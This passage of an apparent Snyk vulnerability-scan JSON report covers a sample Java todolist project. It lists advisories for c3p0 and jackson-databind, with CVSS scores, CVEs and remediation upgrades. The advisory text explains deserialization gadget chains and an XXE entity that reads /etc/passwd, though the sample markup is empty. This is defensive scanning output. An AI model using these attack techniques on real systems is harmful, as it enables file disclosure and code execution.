"3.1", + "modificationTime": "2024-03-06T14:02:14.895852Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.831457Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 4.4, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:53.496388Z" + } + ], + "description": "## Overview\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) due to missing protections against recursive entity expansion when loading XML configurations.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. 
Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nThere is no fixed version for `c3p0:c3p0`.\n\n## References\n- [POC: Hackerone Report](https://hackerone.com/reports/509315)\n", + "epssDetails": { + "percentile": "0.90102", + "probability": "0.02457", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-5427" + ], + "CWE": [ + "CWE-776" + ], + "GHSA": [ + "GHSA-84p2-vf58-xhxv" + ] + }, + "packageName": "c3p0:c3p0", + "proprietary": false, + "creationTime": "2019-09-05T16:24:58.914446Z", + "functions_new": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-04-22T22:18:26Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + 
"packageManager": "maven", + "mavenModuleName": { + "groupId": "c3p0", + "artifactId": "c3p0" + }, + "publicationTime": "2019-04-22T22:18:26Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:53.496388Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "c3p0:c3p0@0.9.1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "c3p0:c3p0", + "version": "0.9.1.2" + }, + { + "id": "snyk:lic:maven:c3p0:c3p0:LGPL-3.0", + "type": "license", + "title": "LGPL-3.0 license", + "semver": { + "vulnerable": [ + "[0,)" + ] + }, + "license": "LGPL-3.0", + "language": "java", + "description": "LGPL-3.0 license", + "packageName": "c3p0:c3p0", + "creationTime": "2024-06-18T02:35:42.971Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T02:35:42.971Z", + "severity": "medium", + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "c3p0:c3p0@0.9.1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "c3p0:c3p0", + "version": "0.9.1.2" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1009829", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.6)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + 
"isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2798", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:47.492797Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.721313Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:04:03.263794Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:47.492797Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.721313Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
It mishandles the interaction between serialization gadgets and typing, related to `com.pastdev.httpcomponents.configuration.JndiConfiguration`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.6 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2798)\n", + "epssDetails": { + "percentile": "0.77013", + "probability": "0.00519", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-24750" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-09-18T13:46:28.613692Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-09-18T13:44:12Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": 
"primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-09-18T16:19:32Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.721313Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1047324", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Srikanth Ramu", + "threedr3am'follower" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2658", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/pull/2864%23issuecomment-701026600", + "title": "GitHub PR" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", 
+ "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:52:55.201119Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:02:44.942188Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:55.201119Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to the class `ignite-jta`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2658)\n- [GitHub PR](https://github.com/FasterXML/jackson-databind/pull/2864#issuecomment-701026600)\n", + "epssDetails": { + "percentile": "0.75677", + "probability": "0.00464", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10650" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-11-29T12:43:11.601162Z", + "functions_new": [ + { + "version": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-09-29T22:30:33Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-11-29T15:58:07.317638Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:52:55.201119Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + 
"com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1048302", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L", + "credit": [ + "Bartosz Baranowski" + ], + "semver": { + "vulnerable": [ + "[2.6.0,2.6.7.4)", + "[2.9.0,2.9.10.7)", + "[2.10.0, 2.10.5.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.6.7.4", + "2.9.10.7", + "2.10.5.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.2, + "functions": [ + { + "version": [ + "[2.6.0,2.6.7.4)", + "[2.9.0,2.9.10.7)", + "[2.10.0, 2.10.5.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ext/DOMSerializer.java", + "className": "DOMSerializer", + "functionName": "" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/612f971b78c60202e9cd75a299050c8f2d724a59", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2589", + "title": "GitHub Issue" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1887664", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N", + "cvssV3BaseScore": 5.8, + "modificationTime": "2024-03-11T09:49:41.313444Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:50:46.628614Z" + }, + { + "assigner": "Red Hat", + 
"severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:51:14.249736Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.2, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:03:31.367594Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N", + "assigner": "SUSE", + "severity": "medium", + "baseScore": 5.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:41.313444Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:46.628614Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:14.249736Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. A flaw was found in FasterXML Jackson Databind, where it does not have entity expansion secured properly in the `DOMDeserializer` class. The highest threat from this vulnerability is data integrity.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. 
By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.7, 2.10.5.1 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/612f971b78c60202e9cd75a299050c8f2d724a59)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2589)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1887664)\n", + "epssDetails": { + "percentile": "0.68432", + "probability": "0.00275", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-25649" + ], + "CWE": [ + "CWE-611" + ], + "GHSA": [ + "GHSA-288c-cq4h-88gq" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-12-04T11:58:40.054903Z", + "functions_new": [ + { + "version": [ + "[2.6.0,2.6.7.4)", + "[2.9.0,2.9.10.7)", + "[2.10.0, 2.10.5.1)" + ], + 
"functionId": { + "className": "com.fasterxml.jackson.databind.ext.DOMSerializer", + "functionName": "" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-12-04T11:54:03Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-12-04T15:22:52Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:14.249736Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052449", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0.pr1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2986", + "title": "GitHub Issue" + } + ], + "cvssDetails": 
[ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:38.926544Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:26.923105Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:42.491903Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.926544Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:26.923105Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.datasources.PerUserPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. 
Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2986)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-35490" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-12-18T11:37:26.422837Z", + "functions_new": [ + { + "version": [ + "[,2.10.0.pr1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-12-18T11:32:48Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-12-18T16:33:11Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:26.923105Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052450", + "title": 
